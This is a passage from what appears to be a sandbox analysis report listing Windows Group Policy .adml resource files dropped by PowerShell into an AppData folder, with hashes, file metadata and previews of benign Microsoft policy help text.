                                                                                          SHA-512:F79C992F4FA17D80A8B65F7AB9753DBBBC12295B80DBDAA3C71CE417B63F9B39774D4ABF5381FD45320E684728FBD05D3761FF37F53A26A3076DF20C3EA2DB71
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PswdSync">Password Synchronization</string>.. <string id="Psync_LoggingLevel">Turn on extensive logging for Password Synchronization</string>.. <string id="Psync_LoggingLevel_Help">This policy setting allows an administrator to turn on extensive logging for Password Synchronization.....If you enable this policy setting, all affected computers that are running Password Synchronization log intermediate steps for password synchronization attempts.....If you disable or do not configure this policy setting, in

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\QOS.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):22100
                                                                                          Entropy (8bit):4.777240545794819
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:S0I0F0I0w0i0O0Q0c0K0F1P0mDeWvyz0gx0YV0BI0l+0Xe0X:f+
                                                                                          MD5:5A29BFD51F48A0377276834F0B8BAF80
                                                                                          SHA1:E1F484C1462470950E95ADC7D7E4FC1A6FA273B6
                                                                                          SHA-256:39B7A57E44813AFFEF1380FC4A2CE929EDAAAB031B457C50381A76996FD6B654
                                                                                          SHA-512:DE4B16EDBAB62DEDF2AC48ABF223AE084B29A7DC6231507ECE14DF273CECA57F1E86C4C9AFAF0CE627394C6523E7D140A1A60E8E9B8D5D7FA93C57304BEE2AF3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="QosDBMC_BestEffort_Help">Specifies an alternate Layer-3 Differentiated Services Code Point (DSCP) value for packets with the Best Effort service type (ServiceTypeBestEffort). The Packet Scheduler inserts the corresponding DSCP value in the IP header of the packets.....This setting applies only to packets that conform to the flow specification.....If you enable this setting, you can change the default DSCP value associated with the Best Effort service type.....If you disable this setting, the system uses the default

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RPC.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (491), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13725
                                                                                          Entropy (8bit):4.739504626052788
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EuPHdbK3t1tsbRP7MaC+9D29YVm8yvRyd4+gzsBUNh8yhXOLzUFoNP1npbNjtKjr:9vdew4argz4/gzsGbF5OLzQm1pFtcr
                                                                                          MD5:C7D0520662B4D6F3A33CD02E7D078832
                                                                                          SHA1:2092E311A0CDB5F1EDBFC9D3A39490EA6F061314
                                                                                          SHA-256:A1595A8F7F77496CB3DAE9BA4A8787985FF7C5C7B50BCE6EA19ECC823B874C57
                                                                                          SHA-512:0F23E0D8B3A0C3007C81794DEA01E218A6810AF134BB40DE84C7509BC2F82C0E6F919E4C2994C2964C977C9F7EC0DFB4456328C928C3A3A67B5EC1126152ACE0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Rpc">Remote Procedure Call</string>.. <string id="RpcEEInfoOff">Off</string>.. <string id="RpcEEInfoOffWithExc">Off with Exceptions</string>.. <string id="RpcEEInfoOn">On</string>.. <string id="RpcEEInfoOnWithExc">On with Exceptions</string>.. <string id="RpcEnableAuthEpResolution">Enable RPC Endpoint Mapper Client Authentication</string>.. <string id="RpcEnableAuthEpResolution_Help">This policy setting controls whether RPC clients authenticate with the Endpoint Mapper Service when the

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RacWmiProv.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1378
                                                                                          Entropy (8bit):4.961792727852399
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3FNPKJAzSIveqsUA0j01oSxz1kFV:cgeD5x8gmYAkFVgeMFV
                                                                                          MD5:B8793F540E47EE449A0369A0569CFB8A
                                                                                          SHA1:3701D0618E2079A6EFDAD7748C21B6B236CD2070
                                                                                          SHA-256:4BEFE402E1D8BAF094346887C509331398720109298EEB4DD947879DFE0A9216
                                                                                          SHA-512:59C4192172AC1BF0278659B1876B3E71ECDD0FE4E2E6B0EC33796C75566F85C0BD1AD6FF5D3BC57382532D65CA3914982369F199781B1DC6E84C1B69CA517D32
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Reliability Analysis Component</displayName>.. <description>Reliability Analysis Component</description>.. <resources>.. <stringTable>.. <string id="RAC">Windows Reliability Analysis</string>.. <string id="ConfigureRacWmi">Configure Reliability WMI Providers</string>.. <string id="ConfigureRacWmi_help">This policy setting allows the Windows Management Instrumentation (WMI) providers Win32_ReliabilityStabilitymetrics and Win32_ReliabilityRecords to provide data to Reliability Monitor in the Action Center control panel, and to respond to WMI requests.....If you enable or do not configure this policy setting, the listed providers will resp

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Radar.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (563), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2714
                                                                                          Entropy (8bit):4.801755208450146
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKbFnok+9MKFLOL5dEyIsaVZ57O0BsYu+P4XEgV:LeD5pmnFnok+9RL+M5jVZ8CsuPeV
                                                                                          MD5:64AFB930E79CDCDF1D967B37180DEC5C
                                                                                          SHA1:AA45CC6BCA49EF263EC3880FFE65F1C5D936CC70
                                                                                          SHA-256:8C710DC3983ED5962C5F7D40C3390C660AE7597CEA71F2BF8FF68B6EFC594CB7
                                                                                          SHA-512:BF40F01F07FB8674902D50A9C7B6C3636714B6C3E5FFC1D045689B46A63024379CB1FE45092FF98912E265433FD4A8970B4CCF539F1AA56831E2283231D55AC7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Resource Exhaustion Detection and Resolution</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">Determines the execution level for Windows Resource Exhaustion Detection and Resolution.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ReAgent.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (483), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1817
                                                                                          Entropy (8bit):4.807685062167235
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gmclqzPa520pns19F9K0SppRPRDdamFV:LeD5pmnvI3R9FV
                                                                                          MD5:74A0325268266B2CDE0E3F5F1597F203
                                                                                          SHA1:088E690A896920238445D6605ACBE4F40498742F
                                                                                          SHA-256:11AB21A9F9176CBC644DBDC5020FA4791086234FB126A5F0885315EFD299BB35
                                                                                          SHA-512:D79952DFB16CF46EF6D91DC4031CDAD7F7D060E92E16E18CECA3CA5B69F017C895FD54655F05F6CEE08C027CC3981BDA16F798726C69A39C95FF923D763B72F0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Recovery</displayName>.. <description>Recovery</description>.. <resources>.. <stringTable>.. <string id="WinRE">Recovery</string>.. <string id="ConfigureWinRESetup">Allow restore of system to default state</string>.. <string id="ConfigureWinRESetup_help"> Requirements: Windows 7.. Description: This policy setting controls whether users can access the options in Recovery (in Control Panel) to restore the computer to the original state or from a user-created system image..... If you enable or do not configure this policy setting, the items "Use a system image you created earlier to recover your computer" and "Reinstall Windows" (

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Reliability.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5310
                                                                                          Entropy (8bit):4.781992069178365
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmAydEk3E7mEvPexos3w33I3tcGBQ4pdV:E8EkCmE3exoiO32tTBQy
                                                                                          MD5:0B7DB39B4E35B6787C19C79280664C11
                                                                                          SHA1:870AA05E92B4B0FACEC8EC4E7D8F5C428748A5A4
                                                                                          SHA-256:3FC94A050B5B845BF0D21AB6D0718A5BC0FD292624A6AA4E7D8E06317DE34863
                                                                                          SHA-512:6E9A356BCE00B25A998A0B63BF6C0B29521DE43DD155712A025311518DC212384C4599B48D403E3E1DD2580E3B5F1D6688930D7441A66488C6A7870EF3233F87
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EE_EnablePersistentTimeStamp">Enable Persistent Time Stamp</string>.. <string id="EE_EnablePersistentTimeStamp_Help">This policy setting allows the system to detect the time of unexpected shutdowns by writing the current time to disk on a schedule controlled by the Timestamp Interval.....If you enable this policy setting, you are able to specify how often the Persistent System Timestamp is refreshed and subsequently written to the disk. You can specify the Timestamp Interval in seconds.....If you disable this

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RemoteAssistance.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (455), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10373
                                                                                          Entropy (8bit):4.861749081876546
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:E2YJPhavu9rf+gZnyy8uI30F3GF3QRcb4vervzv6lQ4:Nfu9rf+CZ8uI30F3GF3QRcbSebjqQ4
                                                                                          MD5:F239E9C6B37ABE7AEE14C64FCD64D86A
                                                                                          SHA1:D703C2A53723A2F933DE2456E706154A29194247
                                                                                          SHA-256:428CCC88349680A1684A33176FED4E4B8BC544EC7B29DCD71CB17BFFE274D16F
                                                                                          SHA-512:8221ABD08D82C27C4AAE3136E8E085C56BF8FF3D4059583F744C5837C61AAD0832D9AE5E84EF77780890A01684EB4F5D5CA33A7E35986435F771FDB67F66D11F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RA_Logging">Turn on session logging</string>.. <string id="RA_Logging_Help">This policy setting allows you to turn logging on or off. Log files are located in the user's Documents folder under Remote Assistance.....If you enable this policy setting, log files are generated.....If you disable this policy setting, log files are not generated.....If you do not configure this setting, application-based settings are used.</string>.. <string id="RA_Optimize_Bandwidth">Turn on bandwidth optimization</string>..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RemovableStorage.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (302), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13642
                                                                                          Entropy (8bit):4.756771021239847
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EnzGj8hc8ROewd8BWwfZ6P0OuI3CDzGvnt7fdXV/gBLtDNGaUgmGaUTGaUFmGaU6:NtjIvGaUBGaUTGaUEGaUUGaUW
                                                                                          MD5:3C7C9203B770747E42F16415384ACA91
                                                                                          SHA1:577E03EBA471F120DB1A1D96648E18E215C57982
                                                                                          SHA-256:61727D2632E0E816A562C6489E5732206A94D3F3581D35042F72FC03A7ECD3D0
                                                                                          SHA-512:7C3F140959497EC753935942A4CB063BA3D431D1F5C4A6FA16BEBD065DE5280C9C0AC34E2A938E413CC7B68A78D2C33BE73DE58F74B1BD71A4A8DBDD12ABF080
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AccessRights_RebootTime">Set time (in seconds) to force reboot</string>.. <string id="AccessRights_RebootTime_Help">This policy setting configures the amount of time (in seconds) that the operating system waits to reboot in order to enforce a change in access rights to removable storage devices.....If you enable this policy setting, you can set the number of seconds you want the system to wait until a reboot.....If you disable or do not configure this setting, the operating system does not force a reboot.....N

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Scripts.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (331), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):12538
                                                                                          Entropy (8bit):4.768527840947223
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:E4w/xBxQzr/8RRROAHPKc16VcDuJxR1Vi3ia67NitbK0pft+pw7TUlyUAGSJ:wnRRPgHkS9A9D1P
                                                                                          MD5:6B1C987D0C322DD0DD627EC2020F90AC
                                                                                          SHA1:C25254DCB050E342AB84633F084B9ABC06EF9239
                                                                                          SHA-256:EBC840298B0A1FB37F1DB1DF288FC5FAEA981B2F8AE4BE9E0E07D11A1E9E0FB5
                                                                                          SHA-512:915A3DB4C3C0572BE46009BA976FFB606FD304B5908207F288C06DFA6A2281153304E7FF368E446BB8CE5217E0DB4FF849DD2119904007057D85ADEBB9B75325
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MaxGPOScriptWaitPolicy">Specify maximum wait time for Group Policy scripts</string>.. <string id="MaxGPOScriptWaitPolicy_Help">This policy setting determines how long the system waits for scripts applied by Group Policy to run. ....This setting limits the total time allowed for all logon, logoff, startup, and shutdown scripts applied by Group Policy to finish running. If the scripts have not finished running when the specified time expires, the system stops script processing and records an error event.....If y

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Securitycenter.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (622), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2466
                                                                                          Entropy (8bit):4.781426635707619
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKBtxHxPUNbhQaB6+J5KaeKUYF1vKUYox2P1C9L5GkMo/2VcSurcFV:LeD5pmdtxHxG64MYfYo8NQL8IGrccFV
                                                                                          MD5:BB7C4CF9B3DDFEFAE5FF4C38B5026EB3
                                                                                          SHA1:157C536B83CB87B194C8BF8018A965EF72DC314B
                                                                                          SHA-256:F49034EF8C96F7E5A19AFB7873AFB1A3F289630390E36C163B12FD2DDC15637A
                                                                                          SHA-512:DE9E2E1824A0B9B03AFC476090D361DD5808C6D0B6C8EB70C7DFC590D8B222C78D062CAB2580E8F74F243CD713EB268BFC72BE232698F15CA269EE007F6B41DE
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SecurityCenter">Security Center</string>.. <string id="SecurityCenter_SecurityCenterInDomain">Turn on Security Center (Domain PCs only)</string>.. <string id="SecurityCenter_SecurityCenterInDomain_Help">This policy setting specifies whether Security Center is turned on or off for computers that are joined to an Active Directory domain. When Security Center is turned on, it monitors essential security settings and notifies the user when the computer might be at risk. The Security Center Control Panel categ

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Sensors.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2056
                                                                                          Entropy (8bit):4.6874178503699655
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKcgWEhQnwgbc+ijJzo/DQxCGgbxCEinEqcN8gUOZFV:LeD5pmkRLRSo/k0V0EvN4CFV
                                                                                          MD5:7CAFF134D90FB9D9BFFD1931A3B7A077
                                                                                          SHA1:6C1305F61CF2978F73F3C8DF3FB7639BC3761863
                                                                                          SHA-256:B102166CF6A473DCE4ADC301156086D0EBA710EFFFA1C4A569EA480994A7F5B4
                                                                                          SHA-512:2D7427C5572797903A6539A872B9AF3062F23BDF24E3004EC61388D321ABBDCF1D063DB00F5703BDC708AA1AE1B5FCF3262F961C3E9CFBC44BFDE8C001A4583D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableSensors">Turn off sensors</string>.. <string id="DisableSensors_Explain">.. This policy setting turns off the sensor feature for this computer..... If you enable this policy setting, the sensor feature is turned off, and all programs on this computer cannot use the sensor feature..... If you disable or do not configure this policy setting, all programs on this computer can use the sensor feature... </string>.. <string id="DisableLocation">Turn off location</string>..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ServerManager.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (387), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4955
                                                                                          Entropy (8bit):4.805565480068189
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmHhpF4FGEkPDY1o1NucOc3EfqYz0LYS0zYS0jfBQ3V:E2hpi4rPE1o1NudbrUMqfBQF
                                                                                          MD5:65C390CEDEDFD130518B61FA1235250A
                                                                                          SHA1:6A55E7AC36FE463A16AF0BE1F7F8B5C1848C0D97
                                                                                          SHA-256:E47082B33ACA0FB727E6486ECA05ED0F7E309923D214DF7D6D1E9E1BB6B58A93
                                                                                          SHA-512:FAC7D91F8DAE73E2719FE7D9E8BDAE71A4B3DD4375943DA8F0B9992E4554E0E95A503BB5F5EEAC6E6475209F9051B343D2928D028A3355EA58F987DD76ADD03D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008OrWindowsServer2008R2Only">Windows Server 2008 and Windows Server 2008 R2 operating systems only</string>.. <string id="DoNotLaunchServerManager">Do not display Server Manager automatically at logon</string>.. <string id="DoNotLaunchServerManagerHelp">This policy setting allows you to turn off the automatic display of Server Manager at logon.....If you enable this policy setting, Server Manager is not displayed automatically when a user logs on to the server.....If you disable t

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Servicing.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (408), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2386
                                                                                          Entropy (8bit):4.892231615075483
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cs+D5p8lF9YGTBdVhcNZPhcNspL8K5pWNLcrdYAkWQ/tgiwavEARV:P+D5iF9YGTnVhcNhhcNspL8KiNFBWQ/P
                                                                                          MD5:C16E4D55B366521038B07E5B2EAA4D1A
                                                                                          SHA1:C8FA7021E315736D6ED23ACA59D8B0CC3460FDD2
                                                                                          SHA-256:0FB29A9479B51033FDE4838E9E61D1D382B173EF4F43C00799EF97940F0E498C
                                                                                          SHA-512:9DC2BFAAE5885EE74E4AB8C7E9D0B6557550F8E6315199F23006F202AA234244CA1802D2D289F95E3213CA577DBD14D7D086CED34BDE2349C127CB31141E2512
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Servicing Policies</displayName>.. <description>Windows Servicing Policies</description>.. <resources>.. <stringTable>.. <string id="CloudFulfillmentGPO">Specify settings for optional component installation and component repair</string>.. <string id="CloudFulfillmentGPOExplanation">..This policy setting specifies the network locations that will be used for the repair of operating system corruption and for enabling optional features that have had their payload files removed.....If you enable this policy setting and specify the new location, the files in that location will be used to repair operating system corruption and for enabling

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SettingSync.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):9740
                                                                                          Entropy (8bit):4.723278539465857
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:PD5pmpC5ZTUe/5edwuTysvjk9yGfUqWxOV:ftHUwueIjkkGfnWw
                                                                                          MD5:A46525DCC0BBEFF3717004AA7D5E686B
                                                                                          SHA1:85429467F34FFB172D7E404E60542C50090C6AFE
                                                                                          SHA-256:044A3C384EC4E46E9EE6AA4BF4D28F3027A758DE7A9163324FE80EE466E935E5
                                                                                          SHA-512:551C90AD33D7ECBE6E0D45B1FF22ED092C239EFC63189D7D0E0FF1147E82C3694ECE958DF4DF5A89F87E4CE966284D9317CEE93D6F38B76152ED26A3D2DC54A0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. General -->.. <string id="SettingSyncCategory">Sync your settings</string>.... Main policy -->.. <string id="DisableSettingSync">Do not sync</string>.. <string id="DisableSettingSync_Help">Prevent syncing to and from this PC. This turns off and disables the "sync your settings" switch on the "sync your settings" page in PC Settings.....If you enable this policy setting, "sync your settings" will be turned off, and none of the "sync your setting" groups will be synced on this PC.....Use the option

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Setup.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2060
                                                                                          Entropy (8bit):4.847450101986129
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ybvkTvKvkTlE6OmYyfbTebTlCa/Yi7R0ryMOVjoV:cgeD5x8gm8fKnxRRxYEbQRj/Yi7S0oV
                                                                                          MD5:9940A876376DFACA4C22AEB49D5E98D1
                                                                                          SHA1:4092EC36B7F64EB2D076D11F04AFBB38C95A9AEB
                                                                                          SHA-256:F0AF5022E574F037FEFF288B1944788E08E9F1C3CC29E2968022B05EE8A12D71
                                                                                          SHA-512:DE5BF65874ABDF5AF96EA22C5D97170AE5B3312B39A2FB3C19F1E33D0A7AC71F2633510E2CE1C87794FE818CD50DA4FB2D328E69C1E0005D9C8D86B96A88C1D8
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ServicePackSourcePath">Specify Windows Service Pack installation file location</string>.. <string id="ServicePackSourcePath_Help">Specifies an alternate location for Windows Service Pack installation files.....If you enable this policy setting, enter the fully qualified path to the new location in the "Windows Service Pack Setup file path" box.....If you disable or do not configure this policy setting, the Windows Service Pack Setup source path will be the location used during the last time Windows Service Pac

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SharedFolders.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1850
                                                                                          Entropy (8bit):4.859149246040625
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKgJxujBDrfS1Z/yqqqYu5BV5ocfS1Z/MFV:LeD5pmCeKV4JcKVMFV
                                                                                          MD5:B512AC9CA34BC2605D206FA9D22778F1
